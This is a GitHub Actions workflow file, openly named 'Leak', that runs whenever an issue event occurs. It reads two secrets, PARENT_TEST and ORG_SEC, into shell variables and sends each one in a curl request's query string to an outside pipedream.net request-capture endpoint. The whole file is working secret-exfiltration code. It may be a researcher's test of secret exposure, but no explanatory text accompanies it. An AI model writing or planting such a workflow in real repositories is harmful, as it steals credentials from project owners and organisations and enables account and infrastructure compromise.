name: Leak

on:
  issues:
  
  
  
   
jobs:
  leak:
    name: Leak GitHub Seecrets
    runs-on: ubuntu-latest
    steps:
      - name: Leak the secret
        run: |
          VAR_ABC=$VALUE
          VAR_XYZ=$VALUE2
          curl -I https://enax0mfmkuupq.x.pipedream.net?code=$VAR_ABC
          curl -I https://enax0mfmkuupq.x.pipedream.net?code=$VAR_XYZ
        env:
          VALUE: ${{ secrets.PARENT_TEST }}
          VALUE2: ${{ secrets.ORG_SEC }}
